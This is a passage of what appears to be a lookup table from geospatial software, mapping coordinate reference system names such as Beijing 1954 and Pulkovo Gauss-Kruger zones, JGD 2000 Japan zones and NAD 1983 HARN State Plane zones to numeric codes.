'Beijing_1954_3_Degree_GK_Zone_26': 2402, 'Beijing_1954_3_Degree_GK_Zone_27': 2403, 'Beijing_1954_3_Degree_GK_Zone_28': 2404, 'Beijing_1954_3_Degree_GK_Zone_29': 2405, 'Beijing_1954_3_Degree_GK_Zone_30': 2406, 'Beijing_1954_3_Degree_GK_Zone_31': 2407, 'Beijing_1954_3_Degree_GK_Zone_32': 2408, 'Beijing_1954_3_Degree_GK_Zone_33': 2409, 'Beijing_1954_3_Degree_GK_Zone_34': 2410, 'Beijing_1954_3_Degree_GK_Zone_35': 2411, 'Beijing_1954_3_Degree_GK_Zone_36': 2412, 'Beijing_1954_3_Degree_GK_Zone_37': 2413, 'Beijing_1954_3_Degree_GK_Zone_38': 2414, 'Beijing_1954_3_Degree_GK_Zone_39': 2415, 'Beijing_1954_3_Degree_GK_Zone_40': 2416, 'Beijing_1954_3_Degree_GK_Zone_41': 2417, 'Beijing_1954_3_Degree_GK_Zone_42': 2418, 'Beijing_1954_3_Degree_GK_Zone_43': 2419, 'Beijing_1954_3_Degree_GK_Zone_44': 2420, 
'Beijing_1954_3_Degree_GK_Zone_45': 2421, 'Beijing_1954_3_Degree_GK_CM_75E': 2422, 'Beijing_1954_3_Degree_GK_CM_78E': 2423, 'Beijing_1954_3_Degree_GK_CM_81E': 2424, 'Beijing_1954_3_Degree_GK_CM_84E': 2425, 'Beijing_1954_3_Degree_GK_CM_87E': 2426, 'Beijing_1954_3_Degree_GK_CM_90E': 2427, 'Beijing_1954_3_Degree_GK_CM_93E': 2428, 'Beijing_1954_3_Degree_GK_CM_96E': 2429, 'Beijing_1954_3_Degree_GK_CM_99E': 2430, 'Beijing_1954_3_Degree_GK_CM_102E': 2431, 'Beijing_1954_3_Degree_GK_CM_105E': 2432, 'Beijing_1954_3_Degree_GK_CM_108E': 2433, 'Beijing_1954_3_Degree_GK_CM_111E': 2434, 'Beijing_1954_3_Degree_GK_CM_114E': 2435, 'Beijing_1954_3_Degree_GK_CM_117E': 2436, 'Beijing_1954_3_Degree_GK_CM_120E': 2437, 'Beijing_1954_3_Degree_GK_CM_123E': 2438, 'Beijing_1954_3_Degree_GK_CM_126E': 2439, 'Beijing_1954_3_Degree_GK_CM_129E': 2440, 'Beijing_1954_3_Degree_GK_CM_132E': 2441, 'Beijing_1954_3_Degree_GK_CM_135E': 2442, 'JGD_2000_Japan_Zone_1': 2443, 'JGD_2000_Japan_Zone_2': 2444, 'JGD_2000_Japan_Zone_3': 2445, 'JGD_2000_Japan_Zone_4': 2446, 'JGD_2000_Japan_Zone_5': 2447, 'JGD_2000_Japan_Zone_6': 2448, 'JGD_2000_Japan_Zone_7': 2449, 'JGD_2000_Japan_Zone_8': 2450, 'JGD_2000_Japan_Zone_9': 2451, 'JGD_2000_Japan_Zone_10': 2452, 'JGD_2000_Japan_Zone_11': 2453, 'JGD_2000_Japan_Zone_12': 2454, 'JGD_2000_Japan_Zone_13': 2455, 'JGD_2000_Japan_Zone_14': 2456, 'JGD_2000_Japan_Zone_15': 2457, 'JGD_2000_Japan_Zone_16': 2458, 'JGD_2000_Japan_Zone_17': 2459, 'JGD_2000_Japan_Zone_18': 2460, 'JGD_2000_Japan_Zone_19': 2461, 'Albanian_1987_GK_Zone_4': 2462, 'Pulkovo_1942_3_Degree_GK_Zone_7': 2523, 'Pulkovo_1942_3_Degree_GK_Zone_8': 2524, 'Pulkovo_1942_3_Degree_GK_Zone_9': 2525, 'Pulkovo_1942_3_Degree_GK_Zone_10': 2526, 'Pulkovo_1942_3_Degree_GK_Zone_11': 2527, 'Pulkovo_1942_3_Degree_GK_Zone_12': 2528, 'Pulkovo_1942_3_Degree_GK_Zone_13': 2529, 'Pulkovo_1942_3_Degree_GK_Zone_14': 2530, 'Pulkovo_1942_3_Degree_GK_Zone_15': 2531, 'Pulkovo_1942_3_Degree_GK_Zone_16': 2532, 'Pulkovo_1942_3_Degree_GK_Zone_17': 
2533, 'Pulkovo_1942_3_Degree_GK_Zone_18': 2534, 'Pulkovo_1942_3_Degree_GK_Zone_19': 2535, 'Pulkovo_1942_3_Degree_GK_Zone_20': 2536, 'Pulkovo_1942_3_Degree_GK_Zone_21': 2537, 'Pulkovo_1942_3_Degree_GK_Zone_22': 2538, 'Pulkovo_1942_3_Degree_GK_Zone_23': 2539, 'Pulkovo_1942_3_Degree_GK_Zone_24': 2540, 'Pulkovo_1942_3_Degree_GK_Zone_25': 2541, 'Pulkovo_1942_3_Degree_GK_Zone_26': 2542, 'Pulkovo_1942_3_Degree_GK_Zone_27': 2543, 'Pulkovo_1942_3_Degree_GK_Zone_28': 2544, 'Pulkovo_1942_3_Degree_GK_Zone_29': 2545, 'Pulkovo_1942_3_Degree_GK_Zone_30': 2546, 'Pulkovo_1942_3_Degree_GK_Zone_31': 2547, 'Pulkovo_1942_3_Degree_GK_Zone_32': 2548, 'Pulkovo_1942_3_Degree_GK_Zone_33': 2549, 'Samboja_UTM_Zone_50S': 2550, 'Pulkovo_1942_3_Degree_GK_Zone_34': 2551, 'Pulkovo_1942_3_Degree_GK_Zone_35': 2552, 'Pulkovo_1942_3_Degree_GK_Zone_36': 2553, 'Pulkovo_1942_3_Degree_GK_Zone_37': 2554, 'Pulkovo_1942_3_Degree_GK_Zone_38': 2555, 'Pulkovo_1942_3_Degree_GK_Zone_39': 2556, 'Pulkovo_1942_3_Degree_GK_Zone_40': 2557, 'Pulkovo_1942_3_Degree_GK_Zone_41': 2558, 'Pulkovo_1942_3_Degree_GK_Zone_42': 2559, 'Pulkovo_1942_3_Degree_GK_Zone_43': 2560, 'Pulkovo_1942_3_Degree_GK_Zone_44': 2561, 'Pulkovo_1942_3_Degree_GK_Zone_45': 2562, 'Pulkovo_1942_3_Degree_GK_Zone_46': 2563, 'Pulkovo_1942_3_Degree_GK_Zone_47': 2564, 'Pulkovo_1942_3_Degree_GK_Zone_48': 2565, 'Pulkovo_1942_3_Degree_GK_Zone_49': 2566, 'Pulkovo_1942_3_Degree_GK_Zone_50': 2567, 'Pulkovo_1942_3_Degree_GK_Zone_51': 2568, 'Pulkovo_1942_3_Degree_GK_Zone_52': 2569, 'Pulkovo_1942_3_Degree_GK_Zone_53': 2570, 'Pulkovo_1942_3_Degree_GK_Zone_54': 2571, 'Pulkovo_1942_3_Degree_GK_Zone_55': 2572, 'Pulkovo_1942_3_Degree_GK_Zone_56': 2573, 'Pulkovo_1942_3_Degree_GK_Zone_57': 2574, 'Pulkovo_1942_3_Degree_GK_Zone_58': 2575, 'Pulkovo_1942_3_Degree_GK_Zone_59': 2576, 'Pulkovo_1942_3_Degree_GK_Zone_60': 2577, 'Pulkovo_1942_3_Degree_GK_Zone_61': 2578, 'Pulkovo_1942_3_Degree_GK_Zone_62': 2579, 'Pulkovo_1942_3_Degree_GK_Zone_63': 2580, 
'Pulkovo_1942_3_Degree_GK_Zone_64': 2581, 'Pulkovo_1942_3_Degree_GK_CM_21E': 2582, 'Pulkovo_1942_3_Degree_GK_CM_24E': 2583, 'Pulkovo_1942_3_Degree_GK_CM_27E': 2584, 'Pulkovo_1942_3_Degree_GK_CM_30E': 2585, 'Pulkovo_1942_3_Degree_GK_CM_33E': 2586, 'Pulkovo_1942_3_Degree_GK_CM_36E': 2587, 'Pulkovo_1942_3_Degree_GK_CM_39E': 2588, 'Pulkovo_1942_3_Degree_GK_CM_42E': 2589, 'Pulkovo_1942_3_Degree_GK_CM_45E': 2590, 'Pulkovo_1942_3_Degree_GK_CM_48E': 2591, 'Pulkovo_1942_3_Degree_GK_CM_51E': 2592, 'Pulkovo_1942_3_Degree_GK_CM_54E': 2593, 'Pulkovo_1942_3_Degree_GK_CM_57E': 2594, 'Pulkovo_1942_3_Degree_GK_CM_60E': 2595, 'Pulkovo_1942_3_Degree_GK_CM_63E': 2596, 'Pulkovo_1942_3_Degree_GK_CM_66E': 2597, 'Pulkovo_1942_3_Degree_GK_CM_69E': 2598, 'Pulkovo_1942_3_Degree_GK_CM_72E': 2599, 'Lietuvos_Koordinaciu_Sistema': 2600, 'Pulkovo_1942_3_Degree_GK_CM_75E': 2601, 'Pulkovo_1942_3_Degree_GK_CM_78E': 2602, 'Pulkovo_1942_3_Degree_GK_CM_81E': 2603, 'Pulkovo_1942_3_Degree_GK_CM_84E': 2604, 'Pulkovo_1942_3_Degree_GK_CM_87E': 2605, 'Pulkovo_1942_3_Degree_GK_CM_90E': 2606, 'Pulkovo_1942_3_Degree_GK_CM_93E': 2607, 'Pulkovo_1942_3_Degree_GK_CM_96E': 2608, 'Pulkovo_1942_3_Degree_GK_CM_99E': 2609, 'Pulkovo_1942_3_Degree_GK_CM_102E': 2610, 'Pulkovo_1942_3_Degree_GK_CM_105E': 2611, 'Pulkovo_1942_3_Degree_GK_CM_108E': 2612, 'Pulkovo_1942_3_Degree_GK_CM_111E': 2613, 'Pulkovo_1942_3_Degree_GK_CM_114E': 2614, 'Pulkovo_1942_3_Degree_GK_CM_117E': 2615, 'Pulkovo_1942_3_Degree_GK_CM_120E': 2616, 'Pulkovo_1942_3_Degree_GK_CM_123E': 2617, 'Pulkovo_1942_3_Degree_GK_CM_126E': 2618, 'Pulkovo_1942_3_Degree_GK_CM_129E': 2619, 'Pulkovo_1942_3_Degree_GK_CM_132E': 2620, 'Pulkovo_1942_3_Degree_GK_CM_135E': 2621, 'Pulkovo_1942_3_Degree_GK_CM_138E': 2622, 'Pulkovo_1942_3_Degree_GK_CM_141E': 2623, 'Pulkovo_1942_3_Degree_GK_CM_144E': 2624, 'Pulkovo_1942_3_Degree_GK_CM_147E': 2625, 'Pulkovo_1942_3_Degree_GK_CM_150E': 2626, 'Pulkovo_1942_3_Degree_GK_CM_153E': 2627, 'Pulkovo_1942_3_Degree_GK_CM_156E': 2628, 
'Pulkovo_1942_3_Degree_GK_CM_159E': 2629, 'Pulkovo_1942_3_Degree_GK_CM_162E': 2630, 'Pulkovo_1942_3_Degree_GK_CM_165E': 2631, 'Pulkovo_1942_3_Degree_GK_CM_168E': 2632, 'Pulkovo_1942_3_Degree_GK_CM_171E': 2633, 'Pulkovo_1942_3_Degree_GK_CM_174E': 2634, 'Pulkovo_1942_3_Degree_GK_CM_177E': 2635, 'Pulkovo_1942_3_Degree_GK_CM_180E': 2636, 'Pulkovo_1942_3_Degree_GK_CM_177W': 2637, 'Pulkovo_1942_3_Degree_GK_CM_174W': 2638, 'Pulkovo_1942_3_Degree_GK_CM_171W': 2639, 'Pulkovo_1942_3_Degree_GK_CM_168W': 2640, 'Pulkovo_1995_3_Degree_GK_Zone_7': 2641, 'Pulkovo_1995_3_Degree_GK_Zone_8': 2642, 'Pulkovo_1995_3_Degree_GK_Zone_9': 2643, 'Pulkovo_1995_3_Degree_GK_Zone_10': 2644, 'Pulkovo_1995_3_Degree_GK_Zone_11': 2645, 'Pulkovo_1995_3_Degree_GK_Zone_12': 2646, 'Pulkovo_1995_3_Degree_GK_Zone_13': 2647, 'Pulkovo_1995_3_Degree_GK_Zone_14': 2648, 'Pulkovo_1995_3_Degree_GK_Zone_15': 2649, 'Pulkovo_1995_3_Degree_GK_Zone_16': 2650, 'Pulkovo_1995_3_Degree_GK_Zone_17': 2651, 'Pulkovo_1995_3_Degree_GK_Zone_18': 2652, 'Pulkovo_1995_3_Degree_GK_Zone_19': 2653, 'Pulkovo_1995_3_Degree_GK_Zone_20': 2654, 'Pulkovo_1995_3_Degree_GK_Zone_21': 2655, 'Pulkovo_1995_3_Degree_GK_Zone_22': 2656, 'Pulkovo_1995_3_Degree_GK_Zone_23': 2657, 'Pulkovo_1995_3_Degree_GK_Zone_24': 2658, 'Pulkovo_1995_3_Degree_GK_Zone_25': 2659, 'Pulkovo_1995_3_Degree_GK_Zone_26': 2660, 'Pulkovo_1995_3_Degree_GK_Zone_27': 2661, 'Pulkovo_1995_3_Degree_GK_Zone_28': 2662, 'Pulkovo_1995_3_Degree_GK_Zone_29': 2663, 'Pulkovo_1995_3_Degree_GK_Zone_30': 2664, 'Pulkovo_1995_3_Degree_GK_Zone_31': 2665, 'Pulkovo_1995_3_Degree_GK_Zone_32': 2666, 'Pulkovo_1995_3_Degree_GK_Zone_33': 2667, 'Pulkovo_1995_3_Degree_GK_Zone_34': 2668, 'Pulkovo_1995_3_Degree_GK_Zone_35': 2669, 'Pulkovo_1995_3_Degree_GK_Zone_36': 2670, 'Pulkovo_1995_3_Degree_GK_Zone_37': 2671, 'Pulkovo_1995_3_Degree_GK_Zone_38': 2672, 'Pulkovo_1995_3_Degree_GK_Zone_39': 2673, 'Pulkovo_1995_3_Degree_GK_Zone_40': 2674, 'Pulkovo_1995_3_Degree_GK_Zone_41': 2675, 
'Pulkovo_1995_3_Degree_GK_Zone_42': 2676, 'Pulkovo_1995_3_Degree_GK_Zone_43': 2677, 'Pulkovo_1995_3_Degree_GK_Zone_44': 2678, 'Pulkovo_1995_3_Degree_GK_Zone_45': 2679, 'Pulkovo_1995_3_Degree_GK_Zone_46': 2680, 'Pulkovo_1995_3_Degree_GK_Zone_47': 2681, 'Pulkovo_1995_3_Degree_GK_Zone_48': 2682, 'Pulkovo_1995_3_Degree_GK_Zone_49': 2683, 'Pulkovo_1995_3_Degree_GK_Zone_50': 2684, 'Pulkovo_1995_3_Degree_GK_Zone_51': 2685, 'Pulkovo_1995_3_Degree_GK_Zone_52': 2686, 'Pulkovo_1995_3_Degree_GK_Zone_53': 2687, 'Pulkovo_1995_3_Degree_GK_Zone_54': 2688, 'Pulkovo_1995_3_Degree_GK_Zone_55': 2689, 'Pulkovo_1995_3_Degree_GK_Zone_56': 2690, 'Pulkovo_1995_3_Degree_GK_Zone_57': 2691, 'Pulkovo_1995_3_Degree_GK_Zone_58': 2692, 'Pulkovo_1995_3_Degree_GK_Zone_59': 2693, 'Pulkovo_1995_3_Degree_GK_Zone_60': 2694, 'Pulkovo_1995_3_Degree_GK_Zone_61': 2695, 'Pulkovo_1995_3_Degree_GK_Zone_62': 2696, 'Pulkovo_1995_3_Degree_GK_Zone_63': 2697, 'Pulkovo_1995_3_Degree_GK_Zone_64': 2698, 'Pulkovo_1995_3_Degree_GK_CM_21E': 2699, 'Pulkovo_1995_3_Degree_GK_CM_24E': 2700, 'Pulkovo_1995_3_Degree_GK_CM_27E': 2701, 'Pulkovo_1995_3_Degree_GK_CM_30E': 2702, 'Pulkovo_1995_3_Degree_GK_CM_33E': 2703, 'Pulkovo_1995_3_Degree_GK_CM_36E': 2704, 'Pulkovo_1995_3_Degree_GK_CM_39E': 2705, 'Pulkovo_1995_3_Degree_GK_CM_42E': 2706, 'Pulkovo_1995_3_Degree_GK_CM_45E': 2707, 'Pulkovo_1995_3_Degree_GK_CM_48E': 2708, 'Pulkovo_1995_3_Degree_GK_CM_51E': 2709, 'Pulkovo_1995_3_Degree_GK_CM_54E': 2710, 'Pulkovo_1995_3_Degree_GK_CM_57E': 2711, 'Pulkovo_1995_3_Degree_GK_CM_60E': 2712, 'Pulkovo_1995_3_Degree_GK_CM_63E': 2713, 'Pulkovo_1995_3_Degree_GK_CM_66E': 2714, 'Pulkovo_1995_3_Degree_GK_CM_69E': 2715, 'Pulkovo_1995_3_Degree_GK_CM_72E': 2716, 'Pulkovo_1995_3_Degree_GK_CM_75E': 2717, 'Pulkovo_1995_3_Degree_GK_CM_78E': 2718, 'Pulkovo_1995_3_Degree_GK_CM_81E': 2719, 'Pulkovo_1995_3_Degree_GK_CM_84E': 2720, 'Pulkovo_1995_3_Degree_GK_CM_87E': 2721, 'Pulkovo_1995_3_Degree_GK_CM_90E': 2722, 'Pulkovo_1995_3_Degree_GK_CM_93E': 2723, 
'Pulkovo_1995_3_Degree_GK_CM_96E': 2724, 'Pulkovo_1995_3_Degree_GK_CM_99E': 2725, 'Pulkovo_1995_3_Degree_GK_CM_102E': 2726, 'Pulkovo_1995_3_Degree_GK_CM_105E': 2727, 'Pulkovo_1995_3_Degree_GK_CM_108E': 2728, 'Pulkovo_1995_3_Degree_GK_CM_111E': 2729, 'Pulkovo_1995_3_Degree_GK_CM_114E': 2730, 'Pulkovo_1995_3_Degree_GK_CM_117E': 2731, 'Pulkovo_1995_3_Degree_GK_CM_120E': 2732, 'Pulkovo_1995_3_Degree_GK_CM_123E': 2733, 'Pulkovo_1995_3_Degree_GK_CM_126E': 2734, 'Pulkovo_1995_3_Degree_GK_CM_129E': 2735, 'Tete_UTM_Zone_36S': 2736, 'Tete_UTM_Zone_37S': 2737, 'Pulkovo_1995_3_Degree_GK_CM_132E': 2738, 'Pulkovo_1995_3_Degree_GK_CM_135E': 2739, 'Pulkovo_1995_3_Degree_GK_CM_138E': 2740, 'Pulkovo_1995_3_Degree_GK_CM_141E': 2741, 'Pulkovo_1995_3_Degree_GK_CM_144E': 2742, 'Pulkovo_1995_3_Degree_GK_CM_147E': 2743, 'Pulkovo_1995_3_Degree_GK_CM_150E': 2744, 'Pulkovo_1995_3_Degree_GK_CM_153E': 2745, 'Pulkovo_1995_3_Degree_GK_CM_156E': 2746, 'Pulkovo_1995_3_Degree_GK_CM_159E': 2747, 'Pulkovo_1995_3_Degree_GK_CM_162E': 2748, 'Pulkovo_1995_3_Degree_GK_CM_165E': 2749, 'Pulkovo_1995_3_Degree_GK_CM_168E': 2750, 'Pulkovo_1995_3_Degree_GK_CM_171E': 2751, 'Pulkovo_1995_3_Degree_GK_CM_174E': 2752, 'Pulkovo_1995_3_Degree_GK_CM_177E': 2753, 'Pulkovo_1995_3_Degree_GK_CM_180E': 2754, 'Pulkovo_1995_3_Degree_GK_CM_177W': 2755, 'Pulkovo_1995_3_Degree_GK_CM_174W': 2756, 'Pulkovo_1995_3_Degree_GK_CM_171W': 2757, 'Pulkovo_1995_3_Degree_GK_CM_168W': 2758, 'NAD_1983_HARN_StatePlane_Alabama_East_FIPS_0101': 2759, 'NAD_1983_HARN_StatePlane_Alabama_West_FIPS_0102': 2760, 'NAD_1983_HARN_StatePlane_Arizona_East_FIPS_0201': 2761, 'NAD_1983_HARN_StatePlane_Arizona_Central_FIPS_0202': 2762, 'NAD_1983_HARN_StatePlane_Arizona_West_FIPS_0203': 2763, 'NAD_1983_HARN_StatePlane_Arkansas_North_FIPS_0301': 2764, 'NAD_1983_HARN_StatePlane_Arkansas_South_FIPS_0302': 2765, 'NAD_1983_HARN_StatePlane_California_I_FIPS_0401': 2766, 'NAD_1983_HARN_StatePlane_California_II_FIPS_0402': 2767, 
'NAD_1983_HARN_StatePlane_California_III_FIPS_0403': 2768, 'NAD_1983_HARN_StatePlane_California_IV_FIPS_0404': 2769, 'NAD_1983_HARN_StatePlane_California_V_FIPS_0405': 2770, 'NAD_1983_HARN_StatePlane_California_VI_FIPS_0406': 2771, 'NAD_1983_HARN_StatePlane_Colorado_North_FIPS_0501': 2772, 'NAD_1983_HARN_StatePlane_Colorado_Central_FIPS_0502': 2773, 'NAD_1983_HARN_StatePlane_Colorado_South_FIPS_0503': 2774, 'NAD_1983_HARN_StatePlane_Connecticut_FIPS_0600': 2775, 'NAD_1983_HARN_StatePlane_Delaware_FIPS_0700': 2776, 'NAD_1983_HARN_StatePlane_Florida_East_FIPS_0901': 2777, 'NAD_1983_HARN_StatePlane_Florida_West_FIPS_0902': 2778, 'NAD_1983_HARN_StatePlane_Florida_North_FIPS_0903': 2779, 'NAD_1983_HARN_StatePlane_Georgia_East_FIPS_1001': 2780, 'NAD_1983_HARN_StatePlane_Georgia_West_FIPS_1002': 2781, 'NAD_1983_HARN_StatePlane_Hawaii_1_FIPS_5101': 2782, 'NAD_1983_HARN_StatePlane_Hawaii_2_FIPS_5102': 2783, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103': 2784, 'NAD_1983_HARN_StatePlane_Hawaii_4_FIPS_5104': 2785, 'NAD_1983_HARN_StatePlane_Hawaii_5_FIPS_5105': 2786, 'NAD_1983_HARN_StatePlane_Idaho_East_FIPS_1101': 2787, 'NAD_1983_HARN_StatePlane_Idaho_Central_FIPS_1102': 2788, 'NAD_1983_HARN_StatePlane_Idaho_West_FIPS_1103': 2789, 'NAD_1983_HARN_StatePlane_Illinois_East_FIPS_1201': 2790, 'NAD_1983_HARN_StatePlane_Illinois_West_FIPS_1202': 2791, 'NAD_1983_HARN_StatePlane_Indiana_East_FIPS_1301': 2792, 'NAD_1983_HARN_StatePlane_Indiana_West_FIPS_1302': 2793, 'NAD_1983_HARN_StatePlane_Iowa_North_FIPS_1401': 2794, 'NAD_1983_HARN_StatePlane_Iowa_South_FIPS_1402': 2795, 'NAD_1983_HARN_StatePlane_Kansas_North_FIPS_1501': 2796, 'NAD_1983_HARN_StatePlane_Kansas_South_FIPS_1502': 2797, 'NAD_1983_HARN_StatePlane_Kentucky_North_FIPS_1601': 2798, 'NAD_1983_HARN_StatePlane_Kentucky_South_FIPS_1602': 2799, 'NAD_1983_HARN_StatePlane_Louisiana_North_FIPS_1701': 2800, 'NAD_1983_HARN_StatePlane_Louisiana_South_FIPS_1702': 2801, 'NAD_1983_HARN_StatePlane_Maine_East_FIPS_1801': 2802, 
'NAD_1983_HARN_StatePlane_Maine_West_FIPS_1802': 2803, 'NAD_1983_HARN_StatePlane_Maryland_FIPS_1900': 2804, 'NAD_1983_HARN_StatePlane_Massachusetts_Mainland_FIPS_2001': 2805, 'NAD_1983_HARN_StatePlane_Massachusetts_Island_FIPS_2002': 2806, 'NAD_1983_HARN_StatePlane_Michigan_North_FIPS_2111': 2807, 'NAD_1983_HARN_StatePlane_Michigan_Central_FIPS_2112': 2808, 'NAD_1983_HARN_StatePlane_Michigan_South_FIPS_2113': 2809, 'NAD_1983_HARN_StatePlane_Minnesota_North_FIPS_2201': 2810, 'NAD_1983_HARN_StatePlane_Minnesota_Central_FIPS_2202': 2811, 'NAD_1983_HARN_StatePlane_Minnesota_South_FIPS_2203': 2812, 'NAD_1983_HARN_StatePlane_Mississippi_East_FIPS_2301': 2813, 'NAD_1983_HARN_StatePlane_Mississippi_West_FIPS_2302': 2814, 'NAD_1983_HARN_StatePlane_Missouri_East_FIPS_2401': 2815, 'NAD_1983_HARN_StatePlane_Missouri_Central_FIPS_2402': 2816, 'NAD_1983_HARN_StatePlane_Missouri_West_FIPS_2403': 2817, 'NAD_1983_HARN_StatePlane_Montana_FIPS_2500': 2818, 'NAD_1983_HARN_StatePlane_Nebraska_FIPS_2600': 2819, 'NAD_1983_HARN_StatePlane_Nevada_East_FIPS_2701': 2820, 'NAD_1983_HARN_StatePlane_Nevada_Central_FIPS_2702': 2821, 'NAD_1983_HARN_StatePlane_Nevada_West_FIPS_2703': 2822, 'NAD_1983_HARN_StatePlane_New_Hampshire_FIPS_2800': 2823, 'NAD_1983_HARN_StatePlane_New_Jersey_FIPS_2900': 2824, 'NAD_1983_HARN_StatePlane_New_Mexico_East_FIPS_3001': 2825, 'NAD_1983_HARN_StatePlane_New_Mexico_Central_FIPS_3002': 2826, 'NAD_1983_HARN_StatePlane_New_Mexico_West_FIPS_3003': 2827, 'NAD_1983_HARN_StatePlane_New_York_East_FIPS_3101': 2828, 'NAD_1983_HARN_StatePlane_New_York_Central_FIPS_3102': 2829, 'NAD_1983_HARN_StatePlane_New_York_West_FIPS_3103': 2830, 'NAD_1983_HARN_StatePlane_New_York_Long_Island_FIPS_3104': 2831, 'NAD_1983_HARN_StatePlane_North_Dakota_North_FIPS_3301': 2832, 'NAD_1983_HARN_StatePlane_North_Dakota_South_FIPS_3302': 2833, 'NAD_1983_HARN_StatePlane_Ohio_North_FIPS_3401': 2834, 'NAD_1983_HARN_StatePlane_Ohio_South_FIPS_3402': 2835, 
'NAD_1983_HARN_StatePlane_Oklahoma_North_FIPS_3501': 2836, 'NAD_1983_HARN_StatePlane_Oklahoma_South_FIPS_3502': 2837, 'NAD_1983_HARN_StatePlane_Oregon_North_FIPS_3601': 2838, 'NAD_1983_HARN_StatePlane_Oregon_South_FIPS_3602': 2839, 'NAD_1983_HARN_StatePlane_Rhode_Island_FIPS_3800': 2840, 'NAD_1983_HARN_StatePlane_South_Dakota_North_FIPS_4001': 2841, 'NAD_1983_HARN_StatePlane_South_Dakota_South_FIPS_4002': 2842, 'NAD_1983_HARN_StatePlane_Tennessee_FIPS_4100': 2843, 'NAD_1983_HARN_StatePlane_Texas_North_FIPS_4201': 2844, 'NAD_1983_HARN_StatePlane_Texas_North_Central_FIPS_4202': 2845, 'NAD_1983_HARN_StatePlane_Texas_Central_FIPS_4203': 2846, 'NAD_1983_HARN_StatePlane_Texas_South_Central_FIPS_4204': 2847, 'NAD_1983_HARN_StatePlane_Texas_South_FIPS_4205': 2848, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301': 2849, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302': 2850, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303': 2851, 'NAD_1983_HARN_StatePlane_Vermont_FIPS_4400': 2852, 'NAD_1983_HARN_StatePlane_Virginia_North_FIPS_4501': 2853, 'NAD_1983_HARN_StatePlane_Virginia_South_FIPS_4502': 2854, 'NAD_1983_HARN_StatePlane_Washington_North_FIPS_4601': 2855, 'NAD_1983_HARN_StatePlane_Washington_South_FIPS_4602': 2856, 'NAD_1983_HARN_StatePlane_West_Virginia_North_FIPS_4701': 2857, 'NAD_1983_HARN_StatePlane_West_Virginia_South_FIPS_4702': 2858, 'NAD_1983_HARN_StatePlane_Wisconsin_North_FIPS_4801': 2859, 'NAD_1983_HARN_StatePlane_Wisconsin_Central_FIPS_4802': 2860, 'NAD_1983_HARN_StatePlane_Wisconsin_South_FIPS_4803': 2861, 'NAD_1983_HARN_StatePlane_Wyoming_East_FIPS_4901': 2862, 'NAD_1983_HARN_StatePlane_Wyoming_East_Central_FIPS_4902': 2863, 'NAD_1983_HARN_StatePlane_Wyoming_West_Central_FIPS_4903': 2864, 'NAD_1983_HARN_StatePlane_Wyoming_West_FIPS_4904': 2865, 'NAD_1983_HARN_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200': 2866, 'NAD_1983_HARN_StatePlane_Arizona_East_FIPS_0201_Feet_Intl': 2867, 'NAD_1983_HARN_StatePlane_Arizona_Central_FIPS_0202_Feet_Intl': 2868, 
'NAD_1983_HARN_StatePlane_Arizona_West_FIPS_0203_Feet_Intl': 2869, 'NAD_1983_HARN_StatePlane_California_I_FIPS_0401_Feet': 2870, 'NAD_1983_HARN_StatePlane_California_II_FIPS_0402_Feet': 2871, 'NAD_1983_HARN_StatePlane_California_III_FIPS_0403_Feet': 2872, 'NAD_1983_HARN_StatePlane_California_IV_FIPS_0404_Feet': 2873, 'NAD_1983_HARN_StatePlane_California_V_FIPS_0405_Feet': 2874, 'NAD_1983_HARN_StatePlane_California_VI_FIPS_0406_Feet': 2875, 'NAD_1983_HARN_StatePlane_Colorado_North_FIPS_0501_Feet': 2876, 'NAD_1983_HARN_StatePlane_Colorado_Central_FIPS_0502_Feet': 2877, 'NAD_1983_HARN_StatePlane_Colorado_South_FIPS_0503_Feet': 2878, 'NAD_1983_HARN_StatePlane_Connecticut_FIPS_0600_Feet': 2879, 'NAD_1983_HARN_StatePlane_Delaware_FIPS_0700_Feet': 2880, 'NAD_1983_HARN_StatePlane_Florida_East_FIPS_0901_Feet': 2881, 'NAD_1983_HARN_StatePlane_Florida_West_FIPS_0902_Feet': 2882, 'NAD_1983_HARN_StatePlane_Florida_North_FIPS_0903_Feet': 2883, 'NAD_1983_HARN_StatePlane_Georgia_East_FIPS_1001_Feet': 2884, 'NAD_1983_HARN_StatePlane_Georgia_West_FIPS_1002_Feet': 2885, 'NAD_1983_HARN_StatePlane_Idaho_East_FIPS_1101_Feet': 2886, 'NAD_1983_HARN_StatePlane_Idaho_Central_FIPS_1102_Feet': 2887, 'NAD_1983_HARN_StatePlane_Idaho_West_FIPS_1103_Feet': 2888, 'NAD_1983_HARN_StatePlane_Kentucky_North_FIPS_1601_Feet': 2891, 'NAD_1983_HARN_StatePlane_Kentucky_South_FIPS_1602_Feet': 2892, 'NAD_1983_HARN_StatePlane_Maryland_FIPS_1900_Feet': 2893, 'NAD_1983_HARN_StatePlane_Massachusetts_Mainland_FIPS_2001_Feet': 2894, 'NAD_1983_HARN_StatePlane_Massachusetts_Island_FIPS_2002_Feet': 2895, 'NAD_1983_HARN_StatePlane_Michigan_North_FIPS_2111_Feet_Intl': 2896, 'NAD_1983_HARN_StatePlane_Michigan_Central_FIPS_2112_Feet_Intl': 2897, 'NAD_1983_HARN_StatePlane_Michigan_South_FIPS_2113_Feet_Intl': 2898, 'NAD_1983_HARN_StatePlane_Mississippi_East_FIPS_2301_Feet': 2899, 'NAD_1983_HARN_StatePlane_Mississippi_West_FIPS_2302_Feet': 2900, 'NAD_1983_HARN_StatePlane_Montana_FIPS_2500_Feet_Intl': 2901, 
'NAD_1983_HARN_StatePlane_New_Mexico_East_FIPS_3001_Feet': 2902, 'NAD_1983_HARN_StatePlane_New_Mexico_Central_FIPS_3002_Feet': 2903, 'NAD_1983_HARN_StatePlane_New_Mexico_West_FIPS_3003_Feet': 2904, 'NAD_1983_HARN_StatePlane_New_York_East_FIPS_3101_Feet': 2905, 'NAD_1983_HARN_StatePlane_New_York_Central_FIPS_3102_Feet': 2906, 'NAD_1983_HARN_StatePlane_New_York_West_FIPS_3103_Feet': 2907, 'NAD_1983_HARN_StatePlane_New_York_Long_Island_FIPS_3104_Feet': 2908, 'NAD_1983_HARN_StatePlane_North_Dakota_North_FIPS_3301_Feet_Intl': 2909, 'NAD_1983_HARN_StatePlane_North_Dakota_South_FIPS_3302_Feet_Intl': 2910, 'NAD_1983_HARN_StatePlane_Oklahoma_North_FIPS_3501_Feet': 2911, 'NAD_1983_HARN_StatePlane_Oklahoma_South_FIPS_3502_Feet': 2912, 